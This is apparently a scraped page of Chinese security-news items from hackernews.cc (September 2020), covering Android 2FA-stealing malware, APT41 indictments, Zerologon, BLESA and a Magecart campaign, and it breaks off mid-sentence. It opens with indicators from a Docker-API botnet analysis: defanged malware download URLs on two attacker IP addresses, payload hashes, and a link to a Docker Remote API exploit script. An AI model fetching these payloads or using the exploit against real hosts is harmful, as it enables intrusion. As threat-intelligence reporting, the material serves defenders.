http[:]//89.40.73.126[:]8080/Linux2.7 http[:]//89.40.73.126/linux2.6 http[:]//89.40.73.126[:]8080/linux-arm http[:]//89.40.73.126[:]8080/Linux2.6 http[:]//89.40.73.126[:]8080/YmY http[:]//89.40.73.126[:]8080/LTF http[:]//89.40.73.126[:]8080/NgYx http[:]//89.40.73.126[:]8080/Mar http[:]//89.40.73.126[:]8080/linux2.6 http[:]//89.40.73.126[:]8080/Flood http[:]//175.24.123.205:88/Fck MD5 Flood 0579a022802759f98bfdf08e7dd16768 Linux2.7 0b0f1684f6791d9f8c44a036aa85a2cc lix 9530e46caab834e1e66a108e15ea97ca linux-arm ca1f347447ddf7990ccd0d6744f3545d Linux 05f28784a0da0c1e406d98c02dc7d560 arm 34eeb9eaa65c4a062311a886dd0157f1 Fck df86da9e341c3a9822f30ac4eba11951 Lov.sh 83caa873cee081162c417eb8dec4a351 Rze.sh 48c910cd9a07404fbfb8bf52847e72c3 SHre.sh bb7cdf5707a857036cd41af4bafaed31 参考链接: https://www.trendmicro.com/en_us/research/19/f/aesddos-botnet-malware-infiltrates-containers-via-exposed-docker-apis.html https://github.com/SPuerBRead/Docker-Remote-API-Exploit/blob/master/dockerAPI_Exploit.py
2020-09-21 10:24:22hackernews.cc
安全公司Check Point表示,它发现了一个伊朗黑客组织开发的特殊Android恶意软件,能够拦截和窃取通过短信发送的双因素验证(2FA)代码。该恶意软件是该公司昵称为Rampant Kitten的黑客组织开发的黑客工具库的一部分。 伪装成欧盟驾照培训辅助应用的App Check Point表示,该组织至少活跃了6年,一直在从事针对伊朗少数族裔、反对组织和抵抗运动的持续监视行动。 这些活动涉及使用广泛的恶意软件系列,包括四种Windows信息窃取工具的变种和伪装在恶意应用程序中的Android后门。 其开发的Windows恶意软件主要用于窃取受害者的个人文件,但也窃取Telegram的Windows桌面客户端的文件,这些文件允许黑客访问受害者的Telegram账户。 此外,面向Windows分支的恶意软件还窃取KeePass密码管理器中的文件,与本周早些时候发布的CISA和FBI关于伊朗黑客及其恶意软件的联合警报中的功能描述一致。 但虽然Rampant Kitten黑客偏爱开发Windows木马,但他们也为Android开发了类似的工具。 在今天发布的一份报告中,Check Point研究人员表示,他们还发现了该组织开发的一个强大的Android后门。该后门可以窃取受害者的通讯录列表和短信,通过麦克风悄悄记录受害者,并显示钓鱼页面。但更值得关注的是,该后门还包含专门针对窃取2FA(双因素认证)的代码。 Check Point表示,该恶意软件会拦截并转发给攻击者任何包含 “G-“字符串的短信,该字符串通常被用于通过短信向用户发送谷歌账户的2FA代码前缀。 其思路是,Rampant Kitten运营商会利用Android木马显示谷歌钓鱼页面,获取用户的账户凭证,然后访问受害者的账户。 如果受害者启用了2FA,恶意软件的2FA短信拦截功能就会悄悄地将2FA短信代码的副本发送给攻击者,让他们绕过2FA。 但事实并非如此。Check Point还发现有证据表明,该恶意软件还会自动转发所有来自Telegram和其他社交网络应用的接收短信。这些类型的消息也包含2FA代码,该团伙很有可能利用这一功能绕过2FA,而不是谷歌账户。 目前,Check Point表示,它发现这个恶意软件隐藏在一个Android应用内,伪装成帮助瑞典讲波斯语的人获得驾照的服务。然而,该恶意软件可能潜伏在其他针对反对德黑兰、生活在伊朗境内外的伊朗人的应用内。 虽然人们普遍认为国家支持的黑客组织通常能够绕过2FA,但我们很少能深入了解他们的工具和他们如何做到这一点。      (稿源:cnBeta,封面源自网络。)
2020-09-18 16:51:03hackernews.cc
安全公司ImmuniWeb在一份有关今年全球网络安全行业在暗网暴露数据的最新报告中,发现97%的领先的网络安全公司都发生了数据泄露或其他安全事件,而平均而言,每个网络安全公司会暴露4,000多个被盗凭证和其他敏感数据。 研究发现: 97%的公司在暗网上发生了数据泄露和其他安全事件。 共发现631512起经核实的安全事件,超过25%(或160529)属于高或严重风险级别事件,其中包含高度敏感的信息,例如明文凭证或PII,包括财务或类似数据。因此,平均每个网络安全公司有1586份被窃取的凭证和其他敏感数据被曝光。在ImmuniWeb的研究中还发现了超过100万个未经证实的事件(1027395),这里面只有159462个被认为是低风险的。 29%的被盗密码是弱密码。研究显示,29%的被盗密码很弱,只有不到8个字符,或者没有大写字母、数字或其他特殊字符。162家公司的约40名员工在不同的违规情况下重复使用相同的密码增加了网络犯罪分子重复使用密码攻击的风险。 色情网站和成人交友网站上使用了专业电子邮件,第三方违规行为占有很大比例,ImmuniWeb的研究发现,5121份证书从被黑客入侵的色情网站或成人交友网站上被窃取。 63%的网络安全公司的网站不符合PCI DSS要求,这意味着它们使用易受攻击或过时的软件(包括JS库和框架)或在阻止模式下没有Web应用程序防火墙(WAF)。 48%的网络安全公司的网站不符合GDPR要求。他们缺乏明显的隐私政策,当cookie包含PII或可追踪标识符时,缺少cookie免责声明。 91家公司存在可利用的网站安全漏洞,其中26%仍未修补。这一发现来自ImmuniWeb,指的是Open Bug Bounty项目中公开可用的数据。 这项研究是使用ImmuniWeb的免费在线域安全测试来进行的,该测试结合了专有的OSINT技术和机器学习,对暗网进行分类。398家领先的网络安全公司接受了测试。 美国的网络安全公司遭受的风险最高,严重,其次是英国和加拿大,再次是爱尔兰,日本,德国,以色列,捷克共和国,俄罗斯和斯洛伐克。 在接受测试的398家网络安全公司中,只有瑞士,葡萄牙和意大利的公司没有遭受任何高风险或重大风险事件,而比利时,葡萄牙和法国的公司经过验证的事件数量最少。 ImmuniWeb首席执行官兼创始人Ilia Kolochenko对这项研究发表了评论: “如今,网络犯罪分子通过针对可信赖的第三方而不是追逐最终受害者,努力实现利润最大化和被捕的风险最小化。例如,大型金融机构通常拥有强大的技术,法证和法律资源,可以及时发现并调查,经常成功地起诉大多数入侵者。 “相反,他们的第三方,从律师事务所到IT公司,通常缺乏对快速增长的针对性攻击和APT做出反应所需的内部专业知识和预算。最终,那些攻击者逍遥法外。在2020年,人们无需花费很多时间,而是找到几个不受保护的第三方,迅速破解最他们薄弱的环节。” “对于当今的任何网络安全和合规计划来说,数据,IT和数字资产的整体可见性和清单都是必不可少的。机器学习和AI等现代技术可以极大地简化和加速从异常检测到错误的大量繁重任务。但是,我们要通过不断监视深网、暗网以及Surface Web中无数的资源(包括公共代码存储库和粘贴网站),在不久的将来,这种环境可能会变得更加复杂。” 完整的研究结果可以在这里查看。     稿件与封面来源:The Hacker News,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-18 15:38:10hackernews.cc
据外媒报道,一名生命垂危的患者因勒索软件攻击被迫去了更远的医院,不幸的是,这位患者最终没能被救回来。当地时间9月10日,德国杜塞尔多夫大学医院遭遇勒索软件攻击,而正是因为这个攻击他们的IT系统中断进而导致门诊治疗和紧急护理无法正常进行。 于是,那些寻求紧急护理的人只能被转移到更远的医院接受治疗。 德国媒体报道称,警方通过赎金说明联系了勒索软件运营商并解释说他们的目标是一家医院。 据悉,留在医院加密服务器上的勒索信息显示,其原本的攻击对象是杜塞尔多夫大学而非杜塞尔多夫大学医院。 在警方联系了勒索软件攻击者并解释说他们加密了一家医院之后,攻击者撤回了赎金要求并提供了解密密钥。 医院在收到钥匙后开始在缓慢地恢复系统,而调查得出的结论显示,数据应该没有被盗。 据NTV报道,杜塞尔多夫大学医院取消了紧急服务登记后,一名生命受到威胁的病人被转到了更远的医院。这种干扰导致病人在一小时后接受治疗很有可能导致了其最后的死亡。对此,德国检察官正在调查此次网络攻击是否犯下过失杀人罪。检方以涉嫌过失杀人罪对这两名身份不明的肇事者展开调查,原因是一名生命危险的病人被送到了伍珀塔尔的一家医院,而这家医院距离事发地约有32公里。 外媒BleepingComputer在新冠病毒大流行初期接触了不同的勒索软件公司看看他们是否会继续攻击医疗保健和医疗机构。对此,CLOP、DoppelPaymer、Maze和Nefilim勒索软件的运营者表示,他们不会以医院为目标,如果有医院被错误加密他们会提供免费的解密密钥。不过Netwalker表示,他们虽然不是以医院为目标,但如果他们不小心加密了一家医院,后者仍需要支付赎金。     (稿源:cnBeta,封面源自网络。)
2020-09-18 15:38:09hackernews.cc
大多数网络安全专业人士都会预料到,攻击者会利用围绕Covid-19流行病进行网络攻击。 当然,恶意电子邮件会包含与Covid-19相关的主题,恶意下载与Covid-19相关。这就是攻击者的运作方式。他们会抓住任何使效率最大化的机会,无论多么卑鄙。 虽然有传闻描述了有关Covid-19的网络攻击将如何展开的问题,但我们几乎没有数据支持Covid-19对网络安全的实际影响。有几家公司报告显示,与Covid-19相关主题的恶意电子邮件数量已经增长了百分之几百,现在大多数与Covid-19相关的电子邮件都是恶意的。 除了与Covid-19相关的恶意电子邮件、视频和一系列可下载文件的增加之外,背后还发生了什么? 有趣的是,网络安全公司Cynet刚刚发布了一份报告(在这里下载),详细描述了自Covid-19流感爆发以来,他们在北美和欧洲观察到的网络攻击的变化。该报告分享了一些有趣的发现,例如在各个行业部门观察到的网络攻击量的变化、网络钓鱼作为初始攻击载体的使用增加以及在网络钓鱼攻击中分发恶意软件的方法。 Cynet发现,攻击者不仅仅是“某种程度上”,而是正在全力以赴地利用Covid-19。攻击者正在拿出他们的全部新的攻击方法,以确保攻击成功。 报告指出,使用新技术进行攻击的比例在20%左右。也就是说,80%的攻击都使用了很容易识别的众所周知的技术(前提是公司已经更新了预防措施)。 自Covid-19流感以来,Cynet发现新的攻击占所有攻击的35%。新的攻击技术仅靠杀毒软件是无法充分检测到的,只有使用新的行为检测机制才能有效地发现新的攻击技术。也就是说,必须使用新的检测方法来检测正在部署的新攻击技术。 请求检测和响应团队(Cynet称之为cypos)的专家帮助的客户数量激增。在流感大流行期间,客户参与率高达250%。 除了使用先进的检测和响应机制外,还需要深厚的网络安全技能来检测和缓解在Covid-19流感期间部署的新攻击技术的急剧上升。 不幸的是,许多公司还没有先进的检测和响应技术,例如扩展检测和响应(XDR)或对全天候管理的检测和响应(MDR)团队的持续访问。当使用新技术的网络攻击在这场大流行期间激增时,没有这些先进保护措施的公司将面临更高的风险。 为了您的网络安全,我们强烈建议您关注XDR和MDR解决方案,使用威胁搜索技术来搜索您的系统,提防新的恶意软件攻击。     稿件与封面来源:The Hacker News,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-17 22:36:07hackernews.cc
9月16日,美国政府指控APT41黑客组织的5名中国公民和2名马来西亚黑客,对全世界100多家公司发动黑客攻击。 这家名为APT41、又被称为“Barium”、“Winnti”、“邪恶熊猫”和“邪恶蜘蛛”的网络间谍组织至少从2012年就开始运作了,它不仅参与了从许多领域的有价值目标那里收集战略情报,而且还参与了对在线游戏行业的攻击。 美国司法部公布的新闻稿显示,五名中国黑客中的两名成员——张浩然和谭代林,于2019年8月被起诉,另外三名成员——蒋立志、钱川和付强,还有两名马来西亚同谋在2020年8月分别被起诉。 后来被起诉的三名中国黑客与一家网络安全公司——成都肆零肆公司有关联。 “至少从2008年开始,付就一直与蒋密切合作,并与蒋在多家互联网和视频游戏相关公司工作。付至少从2013年就开始与钱和蒋合作。在加入成都肆零肆公司之前,付自称是一名熟练的程序员和开发人员。 正如之前在多份报告中发现的,APT41集团专门从事软件供应链攻击,黑客窃取专有的“源代码、软件代码签名证书、客户帐户数据和有价值的商业信息”,并分发经过数字签名的恶意软件版本,以感染目标组织的系统。 法庭文件显示,在一些目标系统没有任何有价值的信息的情况下,被告还使用勒索软件和密码劫持恶意软件来赚钱。 目标产业包括“软件开发公司、计算机硬件制造商、电信供应商、社交媒体公司、电子游戏公司、非营利组织、大学、智囊团和外国政府,以及香港的民主政界人士和活动家。” 新闻稿显示:“被告还破坏了印度和越南的外国政府计算机网络,并锁定了英国的政府计算机网络。” 两名马来西亚黑客王安华(音译)和凌扬青(音译)于2020年9月14日在西塔万被马来西亚当局逮捕,目前正被引渡到美国。联邦调查局表示,5名中国公民仍然在逃。 “除了对所有被控被告发布逮捕令外,美国哥伦比亚特区地方法院于2020年9月签发了扣押令,他们最近扣押了数百个被告用于操作其计算机的帐户、服务器、域名和指挥控制(C2)“死机”网页。 “微软(谷歌、Facebook和Verizon Media除外)的行动是阻止被告继续访问黑客基础设施、工具、账户以及指挥和控制域名的整体努力的重要组成部分。” 目标公司位于美国和世界各地,包括澳大利亚、巴西、智利、香港、印度、印度尼西亚、日本、马来西亚、巴基斯坦、新加坡、韩国、台湾、泰国和越南。 张某和谭某被控25项电脑诈骗和洗钱罪,最高可判20年监禁。 蒋、钱、傅也面临着类似的指控的9项罪名,最高可判20年监禁。 王、凌被指控23项类似罪名,但由于他们也涉及虚假注册域名,因此将把洗钱罪的最高刑期增至27年。     稿件与封面来源:The Hacker News,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-17 18:05:25hackernews.cc
据俄塔社15日报道,美国司法部网站在周二发布声明称,美国当局起诉了两名“黑客”,称他们为报复美国暗杀伊朗“圣城旅”前指挥官卡西姆·苏莱曼尼将军而对美国进行了网络攻击。 美国司法部称,一名19岁的伊朗人和一名25岁的巴勒斯坦人被控犯有网络攻击罪和串谋实施网络攻击。美国负责国家安全事务的助理司法部长约翰·德默斯称,“作为报复美国开展军事行动暗杀苏莱曼尼一事的运动的一部分,这两名黑客攻击了无辜的第三方。”德默斯强调,这两人正在伊朗和巴勒斯坦“躲藏起来,避免遭受审判”。 美国当局指控称,这两名“黑客”于2019年12月开始合作,在美国国防部今年1月3日宣布在伊拉克巴格达国际机场附近开展无人机袭击打死苏莱曼尼之后,他们入侵了58个美国网站。在遭到攻击之后,这些网站的页面上都出现了以伊朗国旗为背景的苏莱曼尼将军的肖像,上面用英语写着“Down with America”。 美国司法部网站声明截图 美国司法部在声明中强调,这些被指控的黑客如果承认自己犯有共谋罪,将面临最高5年的监禁和最高25万美元的罚款,如果被控实施网络犯罪,将面临最高10年的监禁,以及最高25万美元的罚款。目前,美国马萨诸塞州地方法院正在审理此案。 在美国空军去年12月29日对伊拉克民兵组织“真主党旅”位于叙利亚和伊拉克境内的5个目标发动数次袭击之后,中东局势急剧升级。美国五角大楼当时表示,“真主党旅”对此前发生在伊拉克基尔库克基地的袭击事件负有责任,袭击导致美国一名平民雇员丧生。 伊朗将军苏莱曼尼 资料图 1月3日,美国国防部宣布美军在巴格达机场附近发动无人机袭击打死伊朗将军苏莱曼尼,并表示袭击其实是“防御性的”,目的是保护驻伊拉克美军和其他国家的军队。美方还指出,苏莱曼尼似乎同意在美国驻巴格达大使馆前举行抗议活动。作为回应,伊朗在1月8日凌晨对美军在伊拉克的两个目标:艾因-阿萨德基地和埃尔比勒机场发动了导弹袭击。     (稿源:新浪科技,封面源自网络。)
2020-09-17 17:22:32hackernews.cc
前言 2020年6月以来,新一波URSA木马程序(ESET称之为mispadu恶意软件)已影响到多个国家的用户,包括玻利维亚、智利、墨西哥、阿根廷、厄瓜多尔、秘鲁、哥伦比亚、巴拉圭、哥斯达黎加、巴西、西班牙、意大利和葡萄牙。此软件是恶意木马,当安装在受害者的设备上时,它从浏览器和流行软件(如FTP和电子邮件服务)收集密码,并执行银行浏览器覆盖,以诱使受害者介绍银行凭证,这些流程由攻击者在后台逐步执行。 … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1338/     消息与封面来源:Seguranca-Informatica  ,译者:芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-17 12:07:55hackernews.cc
研究人员刚刚曝光了低功耗蓝牙协议存在的一个严重安全漏洞,其全名为低功耗蓝牙欺骗攻击(简称 BLESA),预计有数十亿计的智能手机、平板 / 笔记本电脑、物联网设备首次影响。与此前普遍涉及配对操作的常见漏洞不同,新型 BLESA 攻击是在易被忽略的蓝牙重新连接过程之后发生的。作为经典蓝牙标准的瘦版本,其旨在节省电能和保障续航。 得益于省电节能的特性,低功耗蓝牙(BLE)已在过去十年里被广泛采用,但相关安全漏洞也不断被研究人员曝光。近日,普渡大学的 7 名学者,就在一项新研究中曝光了 BLE 的重连欺骗漏洞。 配对操作期间,两台 BLE 设备(客户 / 服务端)已经过相互认证,并沟通好了彼此的加密密钥。在将蓝牙设备移出范围,下次又返回时,即可对其进行自动重连。 然而研究团队指出,BLE 的官方规范,并未使用足够强的语言来描述重连过程。结果导致在软件供应链的下游,两套系统之间被引入了一个现实的安全隐患。 因为设备重连期间的身份验证是“可选”项,而不是强制性的。若用户设备无法强制 IoT 设备对通信的数据进行身份验证,便很有可能被其绕过。 若被附近攻击者绕过了重连验证,便为 BLESA 攻击敞开了大门。具体说来是,攻击者可将带有错误信息的欺骗数据发送到 BLE 设备,并诱使用户或自动化流程作出错误的决定。 目前已知的是,基于 Linux 的 BlueZ IoT 设备、基于 Android 的 Fluoride、以及 iOS 的 BLE 堆栈都易受到 BLESA 攻击,而 Windows 平台上的 BLE 堆栈则相对安全。 在上月发布的论文中,可知截止 2020 年 6 月,苹果已将 CVE-2020-9770 分配给该漏洞,并作出了修复。然而运行 Android 10 的 Google Pixel XL,仍未采取更加切实有效的防护措施。 好消息是,BlueZ 开发团队表示将弃用易受 BLESA 攻击的部分代码,并换成可适当实现 BLE 重连的修补代码。 不过就像此前的所有蓝牙漏洞一样,对所有易受攻击的设备进行修补,将是系统管理员的一个噩梦(数十亿计的设备)。 如需了解更多有关 BLESA 攻击的详情,还请查阅 8 月在 USENINX WOOT 2020 会议上发表的这篇论文,原标题为《BLESA:针对低功耗蓝牙的重连欺骗攻击》。     (稿源:cnBeta,封面源自网络。)
2020-09-17 11:26:05hackernews.cc
据外媒报道,美联邦检察官于当地时间周三宣布,两名伊朗人被指控侵入美国电脑网络窃取数据,他们的这种行为不仅为获取个人经济利益所用而且还跟伊朗政府做起了生意。联邦检察官指控来自伊朗哈米丹的Hooman Heidarian和Mehdi Farhadi在黑市上出售窃取的数据,包括卖给伊朗政府。 Heidarian和Farhadi还被指控故意破坏网站、发布诋毁伊朗内部反对派、外国对手和其他他们认为跟伊朗敌对的实体的信息。 根据美司法部的一份新闻稿,这些数据包括国家安全、核信息、个人财务信息和知识产权等敏感信息。 目前,这两人都被FBI通缉。 据了解,该案件于当地时间周二在新泽西州的联邦法院提起,被指控的几个目标就在该州。 起诉书称,袭击的目标包括高等教育机构、人权活动人士、电信和媒体机构以及国防承包商。报告称,这些网络攻击至少可以追溯到2013年。 据称,其中一个目标是一个总部设在纽约的国际组织,该组织提倡非军事和安全使用核技术。起诉书称,在2015年达成联合全面行动计划(Joint Comprehensive Plan of Action)即伊朗核协议(Iran nuclear deal)之前,Heidarian和Farhadi窃取了敏感的核信息。 起诉书称,另一个目标是阿富汗的一个政府机构,该机构允许黑客访问到阿富汗总统的内部通讯。 美司法部负责国家安全的助理部长John Demers在一份声明中表示:“除非各国政府拒绝为网络犯罪提供安全港,否则我们不会将法治引入网络空间。今日的被告现在会明白,为伊朗政权服务不是一种资产而是一种犯罪枷锁,他们将一直背负着这种枷锁,直到他们被绳之以法的那一天。”     (稿源:cnBeta,封面源自网络。)
2020-09-17 10:44:23hackernews.cc
系统管理员认为,除非软件更新是专门修复安全漏洞,那么不要在更新出来之后立即安装。就 Windows 更新而言,更是如此。不过推荐用户还是尽快安装今年8月补丁星期二发布的累积更新,因为它修复了严重的 Zerologon 安全漏洞。 在8月的补丁星期二活动日中,微软修复了编号为 CVE-2020-1472 的安全漏洞,这可能是历史上最严重的漏洞之一。攻击者可以利用该漏洞接管企业网络中当作域控制器运行的Windows Servers,可以一键成为Domain Admin。 虽然该漏洞的CVSS 评分为满分10分,但细节从未公开过,也就是说用户和IT 管理员从未意识到该漏洞的严重程度有多高。 Netlogon 是 Windows 上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,同时还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。 通过伪造用于特定 Netlogon 功能的身份验证令牌,他能够调用一个功能以将域控制器的计算机密码设置为已知值。之后,攻击者可以使用此新密码来控制域控制器并窃取域管理员的凭据。     (稿源:cnBeta,封面源自网络。)
2020-09-16 15:46:42hackernews.cc
据外媒报道,二维码(QR code)的使用在新冠大流行期间有所增加,因为它为非接触互动提供了完美的解决方案。但也有很多员工出于个人目的使用移动设备扫描二维码,而这将自己和企业资源都置于危险之中。安全平台MobileIron的一项新研究显示,84%的人以前扫描过二维码,32%的人在过去一周内做过这件事情,26%的人在过去一个月里这么做过。 在过去的六个月里,38%的受访者表示他们在餐馆、酒吧或咖啡馆扫描过二维码,37%的人在零售商和32%的人在消费产品上扫描过二维码。显然,二维码很流行,53%的受访者希望看到它们在未来得到更广泛的应用。43%的人计划在不久的将来使用二维码作为支付方式,40%的人表示如果可以选择的话,他们愿意使用通过邮件收到的二维码进行投票。 然而对于黑客来说,二维码也是一个诱人的攻击途径,因为手机用户界面会提示用户立即采取行动,同时限制用户在访问网站之前获取的信息数量。 MobileIron负责解决方案的全球副总裁Alex Mosher指出:“黑客正在通过移动威胁载体发起攻击,其中包括电子邮件、文本和短信、即时消息、社交媒体和其他通讯方式。我预计我们很快就会看到通过二维码发起的攻击。黑客可以轻易地将含有恶意软件的URL嵌入到二维码中,然后在扫描移动设备时窃取数据。或者黑客可以在指向钓鱼网站的二维码中嵌入恶意URL,鼓励用户泄露他们的身份信息,然后窃取并利用这些信息渗透到一家公司中。” 近3/4(71%)的受访者表示,他们无法区分正版和恶意二维码,不过67%的人能区分正版和恶意网址。 此外,67%的受访者表示知道二维码可以打开一个URL,但只有19%的受访者认为扫描二维码可以起草一封电子邮件,20%的人认为扫描二维码可以开发一个电话,24%的人认为扫描二维码可以发起一个文本消息。而35%的人不确定黑客是否能用二维码锁定目标。 Mosher补充称:“公司需要立即重新考虑他们的安全战略把重点放在移动设备上。与此同时,他们需要优先考虑一个无缝的用户体验。一个统一的端点管理解决方案可以提供所需的IT控制从而保护、管理和监视用于访问业务数据的每台设备、每位用户、每一款应用和每个网络并同时将生产力最大化。组织还可以在UEM的基础上构建移动威胁防御解决方案以检测和补救移动威胁–包括恶意二维码,即使设备处于脱机状态。”     (稿源:cnBeta,封面源自网络。)
2020-09-16 15:46:41hackernews.cc
本文旨在为读者提供有关PRODAFT&INVICTUS威胁情报(PTI)团队针对不同威胁者的最新详细信息,以及发现与臭名昭著的Fin7 APT组织合作的人是谁。 感谢您曾阅读在本系列文章的第一部分。在公开Fin7和REvil组织关系之前,我们试图与勒索软件的受害者联系,同时,我们将继续发布有关Fin7攻击者工具的文章。 在第一篇文章中,我们检查了Carbank后门控制面板的版本更改,并公开了以前未知的Tirion Loader。我们希望Fin7组织在未来使用该装载机取代Carbanak后门。 在本系列的这一部分中,我们将深入研究Fin7攻击者进行的BadUSB攻击。 我们将分以下几部分来介绍整篇文章: BadUSB攻击概述 macOS针对BadUSB攻击 攻击者收集的AV检测统计信息 受害者统计     … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1336/ 消息与封面来源:threatinte  ,译者:芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-16 10:52:28hackernews.cc
根据卡巴斯基公布的最新报告,黑客已经将攻击的目标逐渐迁移到 Linux 服务器和工作站上。虽然 Windows 系统一直是黑客的攻击目标,但是高级持久性威胁(APTs)现在已经成为 Linux 世界的一个严重问题。 尽管像 TwoSail Junk、Sofacy 和 Equation 这样的著名例子已经不胜枚举,但是在大多数用户的认知里,Linux 系统很少甚至从不成为攻击目标。 事实上有许多专门为 Linux 设计的 webshell、后门和 rootkits。最近的一个例子,就是俄罗斯黑客组织 Turla 开发的 Penguin_x64 Linux 后门程序。韩国恶意软件组织 Lazarus 也增加了其Linux恶意软件库,各种工具被用于间谍和金融攻击。 卡巴斯基全球研究和分析团队(GReAT)负责人 Yury Namestnikov 表示: 我们的专家在过去多次发现了加强APT工具集的趋势,以Linux为中心的工具也不例外。为了保证系统的安全,IT和安全部门比以前更频繁地使用Linux。威胁行为者正在通过创建能够渗透此类系统的复杂工具来应对这一问题。我们建议网络安全专家考虑到这一趋势,实施额外的措施来保护他们的服务器和工作站。     (稿源:cnBeta,封面源自网络。)
2020-09-15 18:45:28hackernews.cc
本文旨在为读者提供有关PRODAFT&INVICTUS威胁情报(PTI)团队针对不同威胁者的最新详细信息,以及发现与臭名昭著的Fin7 APT组织合作的人是谁。 所有这些都源自威胁者方面的一次OPSEC故障,我们将尝试逐步扩展主题,类似于我们在不断发现的基础上扩大范围。 关于Fin7和Carbanak的前所未有的事实:第1部分 在5月至2020年7月之间;PRODAFT威胁情报团队的四名成员进行了BlueRaven行动。案例研究源于发现一组看似不重要的轻微OpSec故障。当然,后来发现这些威胁因素与臭名昭著的Fin7 / Carbanak威胁因素有联系。 PTI的OP源于攻击者一方的OPSEC故障。与以前发现和发布的数据不同,使此OP如此与众不同的是,我们设法发现了大量有关攻击者工具集的未发布信息,这些信息揭示了攻击者的TTP。   … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1335/ 消息与封面来源:threatinte  ,译者:芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-15 15:17:52hackernews.cc
据外媒TechCrunch报道,一名安全研究人员发现,美民主党总统候选人乔·拜登的官方竞选应用存在隐私漏洞–任何人都可以查询数百万美国人的敏感选民信息。这款名为Vote Joe的竞选应用允许拜登的支持者在即将到来的美国总统大选中鼓励朋友和家人投票,方法是上传他们的手机联系人列表然后看看他们的朋友和家人是否已经注册投票。 据悉,这款应用将用户上传的联系人跟TargetSmart提供的选民数据进行匹配。TargetSmart是一家政治营销公司,声称拥有超1.91亿美国人的个人文件。 当完成匹配后,该应用就会显示选民的姓名、年龄和生日以及他们在最近的选举中投了票。该应用还称,这将被有助于用户找到自己认识的人并鼓励他们参与进来。 虽然大部分数据都已经可以公开,但这个漏洞可以让任何人都通过这个应用轻松访问任何一位选民的信息。 移动专家App Analyst在以自己的名字命名的博客上详细介绍了自己的发现。他指出,其可以通过在自己的手机上创建一个以选民名字命名的联系人名单来欺骗该应用获取任何人的信息。 他告诉TechCrunch,更糟糕的是,该应用吸收的数据比实际显示的要多得多。通过拦截进出设备的数据,他可以看到更详细、更私密的信息,其中包括选民的家庭住址、出生日期、性别、种族和支持的政党。 拜登的竞选团队修复了这个漏洞并在周五发布了一个应用更新。 拜登竞选团队发言人Matt Hill告诉TechCrunch:“我们被告知,我们的第三方应用开发商从商业数据中提供了不需要的额外信息。于是我们迅速跟供应商合作解决了这个问题并删除了这些信息。我们致力于保护我们的员工、志愿者和支持者的隐私,我们将一直跟供应商合作来做到这一点。” TargetSmart的一名发言人表示,其他用户可以访问有限数量的公开或商业可用数据。 实际上在政治竞选活动中,交易和共享大量选民信息的情况并不少见,这些信息被称为选民档案,其中包括选民的姓名、家庭住址、联系方式以及他们登记的政党等基本信息。每个州的选民档案都有着很大的不同。 虽然这些数据中有很多是可以公开获得的,但政治公司也试图从其他来源获取更多的数据来丰富他们的数据库进而帮助政治竞选活动识别和锁定关键的摇摆选民。     (稿源:cnBeta,封面源自网络。)
2020-09-15 15:17:52hackernews.cc
据外媒报道,英国一项新的诉讼称,谷歌的YouTube在知情的情况下在追踪儿童的网络踪迹,这种行为违反了英国的隐私法。据悉,该诉讼代表了超500万名13岁以下的英国儿童及其父母,他们要求赔偿20亿英镑的损失。诉讼则由研究人员和隐私倡导者Duncan McCann向英国高等法院提出的。技术倡导组织Foxglove则对其提供了支持。 起诉书称,YouTube系统性地违反了英国《数据保护法》和欧盟的《GDPR》中有关未成年用户隐私的规定和数据规定,该平台非法收集了数百万名儿童的数据用于广告投放。 Foxglove写道:“我们认为这是非法的,因为YouTube处理了使用该服务的每个孩子的数据–包括13岁以下的孩子。他们从这些数据中获利,因为广告商向他们支付在YouTube网站上投放定向广告的费用。他们做这些都是没有得到孩子父母的明确同意。” 当地时间周一,YouTube的一位发言人拒绝对彭博社发表评论,但表示该视频分享平台不适用于13岁以下的用户。 然而这已经不是谷歌第一次受到跟隐私相关的诉讼了。今年6月,一项50亿美元的集体诉讼在加州法院提起,谷歌被控在用户隐身状态下跟踪用户的浏览器习惯。2019年10月,一桩价值10亿英镑的集体诉讼在英国上诉法院被重新提起。该投诉称,谷歌故意绕过Safari浏览器的安全设置来跟踪iPhone用户。     (稿源:cnBeta,封面源自网络。)
2020-09-15 15:17:51hackernews.cc
2020年9月12日至13日,全球近2000家Magento 1店遭到黑客攻击,这是迄今为止规模最大的一次有记录的活动。这是一个典型的Magecart攻击:注入的恶意代码将截获不受怀疑的商店客户的付款信息。被检查的商店发现运行Magento版本1,该版本于去年6月宣布停止使用。 Sansec早期漏洞检测系统监控全球电子商务领域的安全威胁,检测到1904个不同的Magento商店,在结账页面上有一个独特的键盘记录(skimmer)。9月11日,有10家商店被感染,12日是1058家,13日是603家,14日是233家。 另请阅读:Adobe与Sansec合作,以提高Magento平台的安全性。 这项自动化活动是Sansec自2015年开始监测以来发现的最大规模的活动。此前的纪录是去年7月一天内有962家店铺被黑客入侵。本周末事件的规模之大说明了网络浏览的复杂性和盈利能力的提高。犯罪分子已经越来越自动化他们的黑客操作,以运行网络掠取计划在尽可能多的商店。 据Sansec估计,上周末,数万名顾客的私人信息通过其中一家受损商店被盗。 Magento exploit $ 5000 在此之前,许多受害商店没有发生过类似的安全事故。这表明攻击者使用了一种新的攻击方法来获得这些存储的服务器(写)访问权限。虽然我们仍在调查确切的原因,但这次活动可能与最近几周前上市的Magento 10天(漏洞利用)有关。 用户z3r0day在一个黑客论坛上宣布以5000美元的价格出售Magento 1“远程代码执行”攻击方法,包括指令视频。据称,不需要事先的Magento管理员帐户。z3r0day强调,由于Magento 